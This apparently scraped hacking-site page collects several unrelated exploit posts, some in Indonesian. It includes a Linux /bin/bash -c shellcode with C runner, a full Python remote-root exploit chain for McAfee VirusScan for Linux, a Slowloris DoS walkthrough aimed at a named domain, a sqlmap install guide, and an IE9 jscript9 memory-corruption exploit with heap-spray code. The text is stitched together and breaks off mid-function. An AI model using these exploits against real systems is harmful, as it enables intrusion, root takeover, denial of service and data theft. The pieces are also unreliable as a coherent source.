Linux/x86 – /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)

/*
;author:    Filippo "zinzloun" Bersani
;date:      16/12/2016
;version:   1.0
;X86 Assembly/NASM Syntax
;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit
;           Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit
;           Linux bb32 4.4.0-45-generic 32bit
;72 bytes
;description:
   executes arbitrary command through /bin/bash -c "command"
    a slightly different and null free version of the metasploit payload:
        https://www.rapid7.com/db/modules/payload/linux/x86/exec
    that is not null free. Crashed on 2 vm of my lab enviroment: OpenSuse001 and bb32
    so I coded this version, anyway thx 2 vlad902 for the great idea
;see comment for details
global _start          
section .text
_start:
xor eax,eax         ;zeroing registers
xor edx,edx
mov al,0xb          ;int execve(const char *filename, char *const argv[],
                        ;        char *const envp[]);
push   edx          ;null
push   word 0x632d  ;-c
mov edi,esp         ;save in edi the -c value
push edx            ;null
push 0x68736162     ;////bin/bash
push 0x2f6e6962
push 0x2f2f2f2f
mov ebx,esp         ;set first arg in ebx=*filename
push   edx          ;null
jmp short push_cmd  ;jump to collect the command
set_argv:
 push edi           ;push -c value
 push ebx           ;push ////bin/bash
 mov ecx,esp        ;*argv = ////bin/bash, -c, cmd, null
 int    0x80
push_cmd:
 call set_argv
 cmd: db "cat /etc/passwd;echo do__ne"
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x31\xd2\xb0\x0b\x52\x66\x68\x2d\x63\x89\xe7\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89"
"\xe3\x52\xeb\x06\x57\x53\x89\xe1\xcd\x80\xe8\xf5\xff\xff\xff\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x3b"
"\x65\x63\x68\x6f\x20\x64\x6f\x5f\x5f\x6e\x65";
main()
{
        printf("Shellcode Length:  %d\n", strlen(code));
        int (*ret)() = (int(*)())code;
        ret();
}

Remote Exploit McAfee Virus Scan Enterprise for Linux

'''
Source: https://nation.state.actor/mcafee.html
Vulnerabilities
CVE-2016-8016: Remote Unauthenticated File Existence Test
CVE-2016-8017: Remote Unauthenticated File Read (with Constraints)
CVE-2016-8018: No Cross-Site Request Forgery Tokens
CVE-2016-8019: Cross Site Scripting
CVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation
CVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location
CVE-2016-8022: Remote Use of Authentication Tokens
CVE-2016-8023: Brute Force Authentication Tokens
CVE-2016-8024: HTTP Response Splitting
CVE-2016-8025: Authenticated SQL Injection
When chaned together, these vulnerabilities allow a remote attacker to execute code as root.
'''
#!/bin/python3
import time
import requests
import os
import sys
import re
import threading
import subprocess
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
# Per-target configuration
target_domain="https://10.0.1.130" # https://target_ip
local_ip = '10.0.1.128'                 # Attacker IP for victim to connect back to
authorized_ip="127.0.0.1"           # IP address cookie will be valid for
update_server_port = 8080               # Port update server listens on
delay_seconds = 10                      # How long should the server take to serve the update
target_port = 55443                 # Port to target
# Put payload script in payload.sh
# Initialization
payload_in_place = threading.Event()
requests.packages.urllib3.disable_warnings()
with open("payload.sh", "r") as f:
    payload = f.read()
def pprint(inp, flag=False):
    pad = "#"
    if flag:
        pad = "*"
    print("\n" + pad+ " " + inp)
def crack_cookie():
    pprint("Cracking Cookie")
    # A page that requires authentication
    url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=productUpdate.html"
    # Start at the current time + 100 in case of recent login with clock skew
    date_val = int(time.time()+100)
    cookie_fmt = authorized_ip+"/n/0/%d-checksum// "+authorized_ip + " "*20
    # Make requests, print after every 600
    while True:
        cookie = cookie_fmt % date_val
        req_cookie = {"nailsSessionId": cookie}
        r = requests.get(url, cookies=req_cookie, verify=False)
        r.raise_for_status()
        if "Set-Cookie" in r.headers:
            valid_cookie = cookie
            timestamp = cookie.split("/")[3].split("-")[0]
            break
        elif date_val % 600 == 0:
            print("Now trying  %s" % time.asctime(time.localtime(date_val)))
        date_val -= 1
    pprint("Cookie Cracked: " + timestamp, True)
    return valid_cookie
def update_update_server(auth_cookie):
    pprint("Updating update server")
    # Replace McAfeeHttp update server with attacker local_ip:update_server_port
    url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&addr=127.0.0.1%3A65443&tplt=" \
    "repository.html&sitelist=add&mon%3A0=db+set+1+_table%3Drepository+status%3D1+siteList%3D%253C%253F" \
    "xml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%250A%253Cns%253ASiteLists" \
    "%2520xmlns%253Ans%253D%2522naSiteList%2522%2520GlobalVersion%253D%2522PATTeELCQSEhZwxKf4PoXNSY4%2Fg%25" \
    "3D%2522%2520LocalVersion%253D%2522Wed%252C%252030%2520Dec%25202009%252011%253A20%253A59%2520UTC%2522%2" \
    "520Type%253D%2522Client%2522%253E%253CPolicies%2F%253E%253CSiteList%2520Default%253D%25221%2522%2520Na" \
    "me%253D%2522SomeGUID%2522%253E%253CHttpSite%2520Type%253D%2522repository%2522%2520Name%253D%2522McAfee" \
    "Http%2522%2520Order%253D%25221%2522%2520Server%253D%2522"+local_ip+"%253A"+str(update_server_port) \
    + "%2522%2520Enabled%253D%25221%2522%2520Local%253D%25221%2522%253E%253CRelativePath%2F%253E%253CUseAuth%" \
    "253E0%253C%2FUseAuth%253E%253CUserName%253E%253C%2FUserName%253E%253CPassword%2520Encrypted%253D%25220" \
    "%2522%2F%253E%253C%2FHttpSite%253E%253CFTPSite%2520Type%253D%2522fallback%2522%2520Name%253D%2522McAfe" \
    "eFtp%2522%2520Order%253D%25222%2522%2520Server%253D%2522ftp.nai.com%253A21%2522%2520Enabled%253D%25221" \
    "%2522%2520Local%253D%25221%2522%253E%253CRelativePath%253ECommonUpdater%253C%2FRelativePath%253E%253CU" \
    "seAuth%253E1%253C%2FUseAuth%253E%253CUserName%253Eanonymous%253C%2FUserName%253E%253CPassword%2520Encr" \
    "ypted%253D%25221%2522%253ECommonUpdater%40McAfeeB2B.com%253C%2FPassword%253E%253C%2FFTPSite%253E%253C%" \
    "2FSiteList%253E%253C%2Fns%253ASiteLists%253E+_cmd%3Dupdate+&mon%3A1=task+setsitelist&mon%3A2=db+select" \
    "+_show%3DsiteList+_show%3Dstatus+_table%3Drepository&info%3A2=multi%2Cshow&reposProperty=repository&re" \
    "posProperty=fallback&useOfProxy=on"
    r = requests.get(url, cookies=auth_cookie, verify=False)
    r.raise_for_status()
    pprint("Updated update server", True)
def download_update(req_cookie):
    pprint("Requesting target download payload")
    # Send request to make target download payload
    url = target_domain + ":" + str(target_port) + "/0409/nails"
    updateName = "update_%d" % int(time.time())
    postdata = ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&scheduleOp=add&mon%3A0=db+set+1+_tab" \
    "le%3Dschedule++taskName%3D{0}+taskType%3DUpdate+taskInfo%3DtoUpdate%3Ddat%253Bengine+timetable%3Dtype%" \
    "3Dunscheduled+status%3DIdle++i_recurrenceCounter%3D0+&mon%3A1=task+nstart+{0}&mon%3A2=db+select+_asc%3D" \
    "taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+_sh" \
    "ow%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dprogress+" \
    "_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offset%3D0&in" \
    "fo%3A2=multi%2Cshow&mon%3A3=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A3=multi%2Cshow&loc" \
    "%3A4=conf+get+browser.resultsPerPage&info%3A4=multi%2Cshow&mon%3A5=task+updatecrontab&info%3A5=multi%2" \
    "Cshow&echo%3A6=1&info%3A6=pageNo&echo%3A7=&info%3A7=selectedTask""").format(updateName)
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)
    r.raise_for_status()
    pprint("Payload download requested", 1)
def exec_catalogz(req_cookie):
    pprint("Making target execute payload")
    #### Get commit_id and ODS_name
    url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=schedOnDemand.html&addr=127.0" \
    ".0.1:65443&mon:0=sconf+ODS+select+section%3Dnailsd.profile.ODS&info:0=multi,show,digest&echo:1=ODS&inf" \
    "o:1=profileName&mon:2=sconf+ODS+select+section%3Dnailsd.profile.ODS_default&info:2=multi,show&echo:3=O" \
    "DS_default&info:3=defaultProfileName&mon:4=sconf+ODS+select+attribute%3Dnailsd.oasEnabled&info:4=multi" \
    ",show&mon:5=extensions&info:5=multi,show&mon:6=db+select+_show=max(i_taskId)+_table=schedule&info:6=mu" \
    "lti,show&mon:7=utco&info:7=single,show,serverUtcOffset&echo:8=generate&info:8=profileNameAction"
    r = requests.get(url, cookies=req_cookie, verify=False)
    r.raise_for_status()
    regex = re.search("\|digest=(.+?)\|", r.text)
    if not regex:
        print("\nERROR: Could not get commit_id when generating evil scan\n")
        return False
    commit_id = regex.groups(1)[0]
    # Send request to start evil scan
    payload_path = "%2Fopt%2FMcAfee%2Fcma%2Fscratch%2Fupdate%2Fcatalog.z"
    binary_path = "%2Fbin%2Fsh" # Use "%2fbin%2Fstatic-sh" for versions 1.x
    url = target_domain + ":" + str(target_port) + "/0409/nails"
    ODS_name = "ODS_1"   # This may need to be increased if the name already exists
    scan_name = "scan_%s" % str(int(time.time()))
    postdata =  ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&mon%3A0=sconf+{1}+begin&info%3A0=" \
    "multi%2Cshow&mon%3A1=sconf+{1}+delete+{0}+section%3Dnailsd.profile.{1}.filter+section%3Dnailsd.prof" \
    "ile.{1}.action&mon%3A2=sconf+{1}+set+{0}+nailsd.profile.{1}.allFiles%3Dtrue+nailsd.profile.{1}.child" \
    "InitTmo%3D240+nailsd.profile.{1}.cleanChildren%3D2+nailsd.profile.{1}.cleansPerChild%3D10000+nailsd" \
    ".profile.{1}.datPath%3D%2Fopt%2FNAI%2FLinuxShield%2Fengine%2Fdat+nailsd.profile.{1}.decompArchive%3" \
    "Dtrue+nailsd.profile.{1}.decompExe%3Dtrue+nailsd.profile.{1}.engineLibDir%3D%2Fopt%2FNAI%2FLinuxShi" \
    "eld%2Fengine%2Flib+nailsd.profile.{1}.enginePath%3D{3}+nailsd.profile.{1}.factoryI" \
    "nitTmo%3D240+nailsd.profile.{1}.heuristicAnalysis%3Dtrue+nailsd.profile.{1}.macroAnalysis%3Dtrue+na" \
    "ilsd.profile.{1}.maxQueSize%3D32+nailsd.profile.{1}.mime%3Dtrue+nailsd.profile.{1}.noJokes%3Dfalse+" \
    "nailsd.profile.{1}.program%3Dtrue+nailsd.profile.{1}.quarantineChildren%3D1+nailsd.profile.{1}.quar" \
    "antineDirectory%3D%2Fquarantine+nailsd.profile.{1}.quarantineFromRemoteFS%3Dfalse+nailsd.profile.{1" \
    "}.quarantinesPerChild%3D10000+nailsd.profile.{1}.scanChildren%3D2+nailsd.profile.{1}.scanMaxTmo%3D3" \
    "00+nailsd.profile.{1}.scanNWFiles%3Dfalse+nailsd.profile.{1}.scanOnRead%3Dtrue+nailsd.profile.{1}.s" \
    "canOnWrite%3Dtrue+nailsd.profile.{1}.scannerPath%3D{4}+nailsd.profile.{1}.scansPerChild" \
    "%3D10000+nailsd.profile.{1}.slowScanChildren%3D0+nailsd.profile.{1}.filter.0.type%3Dexclude-path+na" \
    "ilsd.profile.{1}.filter.0.path%3D%2Fproc+nailsd.profile.{1}.filter.0.subdir%3Dtrue+nailsd.profile.{" \
    "1}.filter.1.type%3Dexclude-path+nailsd.profile.{1}.filter.1.path%3D%2Fquarantine+nailsd.profile.{1}" \
    ".filter.1.subdir%3Dtrue+nailsd.profile.{1}.filter.extensions.mode%3Dall+nailsd.profile.{1}.filter.e" \
    "xtensions.type%3Dextension+nailsd.profile.{1}.action.Default.primary%3DClean+nailsd.profile.{1}.act" \
    "ion.Default.secondary%3DQuarantine+nailsd.profile.{1}.action.App.primary%3DClean+nailsd.profile.{1}" \
    ".action.App.secondary%3DQuarantine+nailsd.profile.{1}.action.timeout%3DPass+nailsd.profile.{1}.acti" \
    "on.error%3DBlock&mon%3A3=sconf+{1}+commit+{0}&mon%3A4=db+set+{0}+_table%3Dschedule++taskName%3D{2}+" \
    "taskType%3DOn-Demand+taskInfo%3DprofileName%3D{1}%2Cpaths%3Dpath%3A%2Ftmp%3Bexclude%3Atrue+timetabl" \
    "e%3Dtype%3Dunscheduled+progress%3D+status%3DIdle+&mon%3A5=task+nstart+{2}&mon%3A6=db+select+_asc%3D" \
    "taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+" \
    "_show%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dpro" \
    "gress+_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offs" \
    "et%3D0&info%3A6=multi%2Cshow&mon%3A7=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A7=mult" \
    "i%2Cshow&mon%3A8=sconf+ODS+begin&info%3A8=multi%2Cshow%2Cdigest&mon%3A9=task+updatecrontab&info%3A9" \
    "=multi%2Cshow&loc%3A10=conf+get+browser.resultsPerPage&info%3A10=multi%2Cshow&echo%3A11=1&info%3A11" \
    "=pageNo&echo%3A12=&info%3A12=selectedTask").format(commit_id, ODS_name, scan_name,payload_path, binary_path)
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)
    r.raise_for_status()
    pprint("Payload executed", 1)
def start_update_server():
    class RequestHandler(BaseHTTPRequestHandler):
        def do_HEAD(s):
            s.send_response(200)
            s.send_header("Content-type", "text/html")
            s.end_headers()
        def do_GET(s):
            if s.path == "/catalog.z":
                s.send_response(200)
                s.send_header("Content-type", "text/html")
                s.end_headers()
                s.wfile.write(bytes(payload, "utf-8"))
                pprint("Payload placed", 1)
                payload_in_place.set()
                # Die after sending payload so we send an incomplete response
                raise KillServer
            else: # Assume all other requests are for SiteStat - Always increasing version
                s.send_response(200)
                s.send_header("Content-type", "text/xml")
                s.end_headers()
                s.wfile.write(bytes(("""<?xml version="1.0" encoding="UTF-8"?>""" \
                """<SiteStatus Status="Enabled" CatalogVersion="2%d">""" \
                """ </SiteStatus>""") % int(time.time()), "utf-8"))
    # Throwing KillServer will shutdown the server ungracefully
    class KillServer(Exception):
        def __str__(self):
            return "Kill Server (not an error)"
    # ThreadingMixIn plus support for KillServer exceptions
    class AbortableThreadingMixIn(ThreadingMixIn):
        def process_request_thread(self, request, client_address):
            try:
                self.finish_request(request, client_address)
                self.shutdown_request(request)
            except KillServer:
                pprint("Killing update server dirtily")
                self.shutdown_request(request)
                self.shutdown() # Only if we want to shutdown
            except:
                self.handle_error(request, client_address)
                self.shutdown_request(request)
    class BackgroundHTTPSrv(AbortableThreadingMixIn, HTTPServer):
        pass
    pprint("Launching update server")
    srv = BackgroundHTTPSrv((local_ip, update_server_port), RequestHandler)
    threading.Thread(target=srv.serve_forever).start()
    pprint("Update server started", 1)
    return srv
####################################################################################
####################################################################################
pprint("Attacking %s" % target_domain, 1)
# Crack the auth cookie
cookie = crack_cookie()
auth_cookie = {"nailsSessionId": cookie}
# Start our update server locally
srv = start_update_server()
# Force target to use our update server
update_update_server(auth_cookie)
# Make target download an update from us
download_update(auth_cookie)
# Block until the target downloads our payload,
payload_in_place.wait()
# Shutdown our update server
srv.shutdown()
# Execute /bin/sh -(?) catalog.z
exec_catalogz(auth_cookie)

DoS Attack With Slowloris

  1. Download slowloris
    https://github.com/llaera/slowloris.pl
  2. Cara menggunakannya:
[email protected]:~/Desktop/exploit# chmod +x slowloris.pl
[email protected]:~/Desktop/exploit# ./slowloris.pl -dns manadohacker.org
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client by Laera Loris
Defaulting to port 80.
Defaulting to a 5 second tcp connection timeout.
Defaulting to a 100 second re-try timeout.
Defaulting to 1000 connections.
Multithreading enabled.
Connecting to manadohacker.org:80 every 100 seconds with 1000 sockets:
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.

 

Install Sqlmap di Windows 10

  1. Download Sqlmap
    https://github.com/sqlmapproject/sqlmap/zipball/master
  2. Download Python untuk windows
    https://www.python.org/downloads/release/python-2712/
  3. Install python 2.7
    – Jalankan installer python dan klik Next

    – Setelah itu akan muncul tampilan seperti pada gambar berikut ini, pada step ini silahkan klik Next aja

    – Kemudian akan muncul lagi window seperti ini
    Namun jika anda ingin menambahkan atau mengurangi fitur yang akan di-install silahkan pilih pada step ini
    Klik Next saja tanpa merubah apa-apa

    –  Selanjutnya akan muncul tampilan seperti berikut

    Tunggu saja sampai proses instalasi selesai dan klik Finish

    – Sampai pada tahap ini instalasi python sudah selesai, namun untuk dapat menggunakan python pada CMD, anda harus memasukan python PATH Environment windows, caranya silahkan buka CMD dengan level Administrator dan jalankan perintah berikut:

    setx path “%path%;C:\Python27;”

    Sekarangan anda sudah bisa menggunakan SQLMAP, silahkan extract Sqlmap yang telah di-download, kemudian masuk pada direktori Sqlmap dan ketikan perintah berikut:

    python sqlmap.py

Microsoft Internet Explorer jscript9 – Java­Script­Stack­Walker Memory Corruption (MS15-056)

<!--
Source: http://blog.skylined.nl/20161206001.html
Synopsis
A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. A pointer set up to point to certain data on the stack can be used after that data has been removed from the stack. This results in a stack-based analog to a heap use-after-free vulnerability. The stack memory where the data was stored can be modified by an attacker before it is used, allowing remote code execution.
Known affected software and attack vectors
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path.
Repro.html:
<!doctype html>
<script>
var o­Window = window.open("about:blank");
o­Window.exec­Script('window.o­URIError = new URIError();o­URIError.name = o­URIError;')
try { "" + o­Window.o­URIError; } catch(e) { }
try { "" + o­Window.o­URIError; } catch(e) { }
</script>
Description
A Javascript can construct an URIError object and sets that object's name property to refer to the URIError object, creating a circular reference. When that Javascript than attempts to convert the URIError object to a string, MSIE attempts to convert the URIError object's name to a string, which creates a recursive code loop that eventually causes a stack exhaustion.
MSIE attempts to handle this situation gracefully by generating a Java­Script exception. While generating the exception, information about the call stack is gathered using the Javascript­Stack­Walker class. It appears that the code that does this initializes a pointer variable on the stack the first time it is run, but re-uses it if it gets called a second time. Unfortunately, the information the pointer points to is also stored on the stack, but is removed from the stack after the first exception is handled. Careful manipulation of the stack during both exceptions allow an attacker to control the data the pointer points to during the second exception.
This problem is not limited to the URIError object: any recursive function call can be used to trigger the issue, as shown in the exploit below.
Exploit
As mentioned above, the vulnerable pointer points to valid stack memory during the first exception, but it is "popped" from the stack before the second. In order to exploit this vulnerability, the code executed during the first exception is going to point this pointer to a specific area of the stack, while the code executed during the second is going to allocate certain values in that same area before the pointer is re-used.
Control over the stack contents during a stack exhaustion can be achieved by making the recursive calls with many arguments, all of which are stored on the stack. This is similar to a heap-spray storing values on large sections of the heap in that it is not entirely deterministic, but the odds are very highly in favor of you setting a certain value at a certain address.
The exploit triggers the first exception by making recursive calls using a lot of arguments. In each loop, a lot of stack space is needed to make the next call. At some point there will not be enough stack space left to make another call and an exception is thrown. If N arguments are passed during each call, N*4 bytes of stack are needed to store them. The number of bytes left on the stack at the time of the exception varies from 0 to about 4*N and thus averages to about 4*N/2. The vulnerable pointer gets initialized to point to an address near the stack pointer at the time of the exception, at approximately (bottom of stack) + 4*N/2.
The exploit then triggers another stack exhaustion by making recursive calls using many arguments, but significantly less than before. If M arguments are passed during each call this time, the number of bytes left on the stack at the time of the exception averages to about 4*M/2.
When the second exception happens, the vulnerable pointer points inside the stack that was "sprayed" with function arguments. This means we can control where it points to. The pointer is used as an object pointer to get a function address from a vftable, so by using the right value to spray the stack, we can gain full control over execution flow.
The below schematic shows the layout of the stack during the various stages of this exploit:
| |
|<- bottom of stack top of stack ->|
| |
| Stack layout at the moment the first exception is triggered: |
| |
| [--- CALL X ---][-- CALL X-1 --][-- CALL X-2 --][...........]|
| |
|{---------------} Stack space available is less than 4*N bytes |
| |
| ^^^ |
| Vulnerable pointer gets initialized to point around here |
| |
| |
| |
| Stack layout at the moment the second exception is triggered: |
| |
| [CALL Y][CALL Y-1][CALL Y-2][CALL Y-3][CALL Y-3][........................]|
| |
|{--} Stack space available is less than 4*M bytes |
| |
| ^^^ |
| Vulnerable pointer still points around here, most likely at |
| one of the arguments pushed onto the stack in a call. |
| |
In the Proof-of-Concept code provided below, the first exception is triggered by recursively calling a function with 0x2000 arguments (N = 0x2000). The second exception is triggered by recursively calling a function with 0x200 arguments (M = 0x200). The values passed as arguments during the second stack exhaustion are set to cause the vulnerable pointer to point to a fake vftable on the heap. The heap is sprayed to create this fake vftable. A fake function address is stored at 0x28000201 (p­Target) that points to a dummy shellcode consisting of int3's at 0x28000300 (p­Shellcode). Once the vulnerability is triggered, the vulnerable pointer is used to read the pointer to our shellcode from our fake vftable and called, which will attempt to execute our shellcode.
Sploit.html:
-->
<!doctype html>
<script src="String.js"></script>
<script src="spray­Heap.js"></script>
<script>
function stack­Overflow­High­On­Stack() {
stack­Overflow­High­On­Stack.apply(0, new Array(0x2000));
}
function attack(p­Target) {
var ax­Args = [];
while (ax­Args.length < 0x200) ax­Args.push((p­Target - 0x69C) >>> 1);
exception­Low­On­Stack­With­Spray();
function exception­Low­On­Stack­With­Spray() {
try {
(function(){}).apply(0, ax­Args);
} catch (e) {
throw 0;
}
exception­Low­On­Stack­With­Spray.apply(0, ax­Args);
}
}
var p­Spray­Start­Address = 0x09000000;
var d­Heap­Spray­Template = {};
var p­Target = 0x28000201;
var p­Shellcode = 0x28000300;
d­Heap­Spray­Template[p­Target] = p­Shellcode;
d­Heap­Spray­Template[p­Shellcode] = 0x­CCCCCCCC;
window.s­Heap­Spray­Block = create­Spray­Block(d­Heap­Spray­Template);
window.u­Heap­Spray­Block­Count = get­Spray­Block­Count(d­Heap­Spray­Template, p­Spray­Start­Address);
var o­Window = window.open("about:blank");
function prepare() {
window.as­Heap­Spray = new Array(opener.u­Heap­Spray­Block­Count);
for (var i = 0; i < opener.u­Heap­Spray­Block­Count; i++) {
as­Heap­Spray[i] = (opener.s­Heap­Spray­Block + "A").substr(0, opener.s­Heap­Spray­Block.length);
}
}
o­Window.eval("(" + prepare + ")();");
try {
String(o­Window.eval("({to­String:" + stack­Overflow­High­On­Stack + "})"));
} catch(e) {
o­Window.eval("(" + attack + ")(" + p­Target + ")");
}
</script>
<!--
String.js:
String.from­Word = function (w­Value) {
// Return a BSTR that contains the desired DWORD in its string data.
return String.from­Char­Code(w­Value);
}
String.from­Words = function (aw­Values) {
// Return a BSTR that contains the desired DWORD in its string data.
return String.from­Char­Code.apply(0, aw­Values);
}
String.from­DWord = function (dw­Value) {
// Return a BSTR that contains the desired DWORD in its string data.
return String.from­Char­Code(dw­Value & 0x­FFFF, dw­Value >>> 16);
}
String.from­DWords = function (au­Values) {
var as­DWords = new Array(au­Values.length);
for (var i = 0; i < au­Values.length; i++) {
as­DWords[i] = String.from­DWord(au­Values[i]);
}
return as­DWords.join("");
}
String.prototype.repeat = function (u­Count) {
// Return the requested number of concatenated copies of the string.
var s­Repeated­String = "",
u­Left­Most­Bit = 1 << (Math.ceil(Math.log(u­Count + 1) / Math.log(2)) - 1);
for (var u­Bit = u­Left­Most­Bit; u­Bit > 0; u­Bit = u­Bit >>> 1) {
s­Repeated­String += s­Repeated­String;
if (u­Count & u­Bit) s­Repeated­String += this;
}
return s­Repeated­String;
}
String.create­Buffer = function(u­Size, u­Index­Size) {
// Create a BSTR of the right size to be used as a buffer of the requested size, taking into account the 4 byte
// "length" header and 2 byte "\0" footer. The optional argument u­Index­Size can be 1, 2, 4 or 8, at which point the 
// buffer will be filled with indices of said size (this is slower but useful for debugging).
if (!u­Index­Size) return "\u­DEAD".repeat(u­Size / 2 - 3);
var au­Buffer­Char­Codes = new Array((u­Size - 4) / 2 - 1);
var u­MSB = u­Index­Size == 8 ? 8 : 4; // Most significant byte.
for (var u­Char­Index = 0, u­Byte­Index = 4; u­Char­Index < au­Buffer­Char­Codes.length; u­Char­Index++, u­Byte­Index +=2) {
if (u­Index­Size == 1) {
au­Buffer­Char­Codes[u­Char­Index] = u­Byte­Index + ((u­Byte­Index + 1) << 8);
} else {
// Set high bits to prevents both NULLs and valid pointers to userland addresses.
au­Buffer­Char­Codes[u­Char­Index] = 0x­F000 + (u­Byte­Index % u­Index­Size == 0 ? u­Byte­Index & 0x­FFF : 0);
}
}
return String.from­Char­Code.apply([][0], au­Buffer­Char­Codes);
}
String.prototype.clone = function () {
// Create a copy of a BSTR in memory.
s­String = this.substr(0, this.length);
s­String.length;
return s­String;
}
String.prototype.replace­DWord = function (u­Byte­Offset, dw­Value) {
// Return a copy of a string with the given dword value stored at the given offset.
// u­Offset can be a value beyond the end of the string, in which case it will "wrap".
return this.replace­Word(u­Byte­Offset, dw­Value & 0x­FFFF).replace­Word(u­Byte­Offset + 2, dw­Value >> 16);
}
String.prototype.replace­Word = function (u­Byte­Offset, w­Value) {
// Return a copy of a string with the given word value stored at the given offset.
// u­Offset can be a value beyond the end of the string, in which case it will "wrap".
if (u­Byte­Offset & 1) {
return this.replace­Byte(u­Byte­Offset, w­Value & 0x­FF).replace­Byte(u­Byte­Offset + 1, w­Value >> 8);
} else {
var u­Char­Index = (u­Byte­Offset >>> 1) % this.length;
return this.substr(0, u­Char­Index) + String.from­Word(w­Value) + this.substr(u­Char­Index + 1);
}
}
String.prototype.replace­Byte = function (u­Byte­Offset, b­Value) {
// Return a copy of a string with the given byte value stored at the given offset.
// u­Offset can be a value beyond the end of the string, in which case it will "wrap".
var u­Char­Index = (u­Byte­Offset >>> 1) % this.length,
w­Value = this.char­Code­At(u­Char­Index);
if (u­Byte­Offset & 1) {
w­Value = (w­Value & 0x­FF) + ((b­Value & 0x­FF) << 8);
} else {
w­Value = (w­Value & 0x­FF00) + (b­Value & 0x­FF);
}
return this.substr(0, u­Char­Index) + String.from­Word(w­Value) + this.substr(u­Char­Index + 1);
}
String.prototype.replace­Buffer­DWord = function (u­Byte­Offset, u­Value) {
// Return a copy of a BSTR with the given dword value store at the given offset.
if (u­Byte­Offset & 1) throw new Error("u­Byte­Offset (" + u­Byte­Offset.to­String(16) + ") must be Word aligned");
if (u­Byte­Offset < 4) throw new Error("u­Byte­Offset (" + u­Byte­Offset.to­String(16) + ") overlaps BSTR size dword.");
var u­Char­Index = u­Byte­Offset / 2 - 2;
if (u­Char­Index == this.length - 1) throw new Error("u­Byte­Offset (" + u­Byte­Offset.to­String(16) + ") overlaps BSTR terminating NULL.");
return this.substr(0, u­Char­Index) + String.from­DWord(u­Value) + this.substr(u­Char­Index + 2);
}
spray­Heap.js:
console = window.console || {"log": function(){}};
function bad(p­Address) {
// convert a valid 32-bit pointer to an invalid one that is easy to convert
// back. Useful for debugging: use a bad pointer, get an AV whenever it is
// used, then fix pointer and continue with exception handled to have see what
// happens next.
return 0x80000000 + p­Address;
}
function blanket(d­Spray_­dw­Value_­p­Address, p­Address) {
// Can be used to store values that indicate offsets somewhere in the heap
// spray. Useful for debugging: blanket region, get an AV at an address
// that indicates where the pointer came from. Does not overwrite addresses
// at which data is already stored.
for (var u­Offset = 0; u­Offset < 0x40; u­Offset += 4) {
if (!((p­Address + u­Offset) in d­Spray_­dw­Value_­p­Address)) {
d­Spray_­dw­Value_­p­Address[p­Address + u­Offset] = bad(((p­Address & 0x­FFF) << 16) + u­Offset);
}
}
}
var gu­Spray­Block­Size = 0x02000000; // how much fragmentation do you want?
var gu­Spray­Page­Size = 0x00001000; // block alignment.
// Different versions of MSIE have different heap header sizes:
var s­JSVersion;
try{
/*@cc_­on @*/
s­JSVersion = eval("@_jscript_­version");
} catch(e) {
s­JSVersion = "unknown"
};
var gu­Heap­Header­Size = {
"5.8": 0x24,
"9": 0x10, // MSIE9
"unknown": 0x10
}[s­JSVersion]; // includes BSTR length
var gu­Heap­Footer­Size = 0x04;
if (!gu­Heap­Header­Size)
throw new Error("Unknown script version " + s­JSVersion);
function create­Spray­Block(d­Spray_­dw­Value_­p­Address) {
// Create a spray "page" and store spray data at the right offset.
var s­Spray­Page = "\u­DEAD".repeat(gu­Spray­Page­Size >> 1);
for (var p­Address in d­Spray_­dw­Value_­p­Address) {
s­Spray­Page = s­Spray­Page.replace­DWord(p­Address % gu­Spray­Page­Size, d­Spray_­dw­Value_­p­Address[p­Address]);
}
// Create a spray "block" by concatinated copies of the spray "page", taking into account the header and footer
// used by MSIE for larger heap allocations.
var u­Spray­Pages­Per­Block = Math.ceil(gu­Spray­Block­Size / gu­Spray­Page­Size);
var s­Spray­Block = (
s­Spray­Page.substr(gu­Heap­Header­Size >> 1) +
s­Spray­Page.repeat(u­Spray­Pages­Per­Block - 2) +
s­Spray­Page.substr(0, s­Spray­Page.length - (gu­Heap­Footer­Size >> 1))
);
var u­Actual­Spray­Block­Size = gu­Heap­Header­Size + s­Spray­Block.length * 2 + gu­Heap­Footer­Size;
